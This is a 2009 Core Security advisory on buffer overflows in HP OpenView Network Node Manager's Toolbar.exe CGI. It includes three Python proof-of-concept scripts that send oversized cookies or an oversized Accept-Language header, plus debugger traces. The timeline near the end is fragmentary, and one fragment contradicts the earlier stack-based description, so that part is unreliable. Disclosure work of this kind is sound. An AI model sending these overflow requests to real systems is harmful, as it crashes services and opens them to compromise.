10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.852 High
EPSS
Percentile
98.5%
Title: HP OpenView Buffer Overflows
**Advisory ID:**CORE-2009-0122
**Date published:**2009-03-23
**Date of last update:**2009-03-19
**Vendors contacted:**Hewlett-Packard
**Release mode:**Coordinated release
**Class:**Buffer overflow
**Remotely Exploitable:**Yes
**Locally Exploitable:**No
Bugtraq ID:34134, 34135
CVE Name:CVE-2009-0920, CVE-2009-0921
Several buffer overflows have been found in HP OpenView Network Node Manager, which can be exploited to remotely compromise a user’s system.
These vulnerabilities were discovered and researched by Oren Isacson from Core Security Technologies.
Several buffer overflows have been found in HP OpenView Network Node Manager, which can be exploited to remotely compromise a user’s system.
While working on an exploit for the vulnerabilities disclosed in the advisory [3], three bugs were found. The stack-based bug found on CGI parameter OvOSLocale
is similar to one of the bugs previously reported in [3] whereas the two heap-based bugs are different vulnerabilities.
Versions 7.51, 7.53, and 7.53 with patch NNM_01195 were tested and all of them were vulnerable. The two heap-based buffer overflows are different vulnerabilities from those exposed publicly on CVE-2008-0067 because the vulnerabilities are not fixed with patch NNM_01195 and are not mentioned on published advisories.
CVE identification code CVE-2009-0920 was assigned to the unpatched/variant stack-based overflow related to CVE-2008-0067, and CVE-2009-0921 was assigned for the two heap overflows. Bugtraq IDs (BIDs) were assigned: 34134 for OvAcceptLang
parameter bug; and 34135 for the Accept-Language
HTTP header bug.
It is important to remark that the stack-based bug on parameter OvOSLocale
, that we assumed to be mentioned on published advisories, is not fixed by the previous patch NNM_01195. Proof of concept follows.
import socket,sys if len(sys.argv)!=3: print "USAGE:OvOSLocale.py server port" else: req="GET /OvCgi/Toolbar.exe HTTP/1.0\nCookie: OvOSLocale=en_US"+'a'*1400+"; OvAcceptLang=en-usa\n\n" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #s.connect(('127.0.0.1',80)) s.connect((sys.argv[1],int(sys.argv[2]))) s.send(req) print s.recv(4000)
A debugger was used on a Windows system to see where the OvOSLocale
overflow is located. The call stack shows that _OVresetLangEnv
in ovutil.dll
calls ov.sprintf_new
in ov.dll
that calls _vsnprintf
in msvcrt.dll
. The destination buffer of the _vsnprintf
is located on the stack, the count is 0x7fff, the format is OV_LANG=%s
, and the string is too large for the stack buffer, causing the stack overflow. A new CVE name was assigned, CVE-2009-0920, marking this bug as unfixed or variant.
Sending HTTP requests to the Toolbar.exe
application with large OvAcceptLang
cookies causes a buffer overflow. For example the following Python program causes an access violation on Toolbar.exe
if executed on a windows machine running NNM Admin. The return code of the web server is 502
, signaling an error on the CGI application. Using similar requests, remote code execution is possible. Toolbar.exe
is just an exploitation path; in the case of parameter OvAcceptLang
the bug is actually located on ov.dll
(i.e. on Windows).
import socket,sys if len(sys.argv)!=3: print "USAGE:OvAcceptLang.py server port" else: req="GET /OvCgi/Toolbar.exe HTTP/1.0\nCookie: OvOSLocale=en_US; OvAcceptLang=en-usa"+'a'*1400+"\n\n" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((sys.argv[1],int(sys.argv[2]))) s.send(req) print s.recv(4000)
A debugger was also used to see where the OvAcceptLang
overflow is located. The program being debugged is Toolbar.exe
. This is the call stack of the _vsnprintf
function that we think causes the overflow. It can be seen that the real culprit is located in ovwww.dll. A call is made to sprintf_new
with a destination buffer located in the heap that is too small to hold the written string.
0012724C 00392F98 ASCII "OvAcceptLang" 00127250 006C4BD0 ASCII "en-usaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"... Call stack of main thread Address Stack Procedure / arguments Called from Frame 00117214 5A028A26 msvcrt._vsnprintf ov.5A028A20 0012723C 00117218 00117234 buffer = 00117234 0011721C 00007FFF count = 7FFF (32767.) 00117220 5A316680 format = "%s=%s" 00117224 0012724C arglist = 0012724C 00127240 5A308715 ov.sprintf_new ovwww.5A30870F 0012723C 00127268 5A308618 ovwww.5A3086D0 ovwww.5A308613 00127264 00127288 5A3081CB ovwww.5A3085D0 ovwww.5A3081C6 00127284 001272A0 5A30C930 ovwww.setCookie ovwww.5A30C92B 0012729C 00127308 5A307F26 ovwww.5A30C675 ovwww.5A307F21 00127304 0012792C 00401029 ovwww.?OvWwwInit@@YAXAAHQAPADPBD@Z Toolbar.00401023 00127928 0012FF50 004013A2 Toolbar.00401000 Toolbar.0040139D 0012FF4C
When sending a large Accept-Language
HTTP header another heap buffer is overflowed. This vulnerability could also be used to obtain remote code execution. On Solaris, the bug is located inside libovwww.so.4
and on Windows inside ovwww.dll
.
import socket,sys if len(sys.argv)!=3: print "USAGE:AcceptLanguage.py server port" else: req="POST /OvCgi/Toolbar.exe HTTP/1.0\nAccept-Language: "+'a'*1400+"\nContent-Length:0\nHost:192.168.22.252\n\n" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((sys.argv[1],int(sys.argv[2]))) s.send(req) print s.recv(4000)
OvAcceptLang
) and finds two new bugs, one heap overflow on CGI parameter OvOSLocale
and a heap overflow on HTTP header Accept-Language
.ov.dll
installed.ov.dll
was found and that the real culprit for the OvAcceptLang bug is located on ovwww.dll
. Detailed debugging information is sent.[1] Secunia Research 07/01/2009
<http://secunia.com/secunia_research/2008-13/>
[2] CVE-2008-0067
<https://vulners.com/cve/CVE-2008-0067>
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: www.coresecurity.com/core-labs.
Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company’s flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. www.coresecurity.com
The contents of this advisory are copyright © 2009 Core Security Technologies and © 2009 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.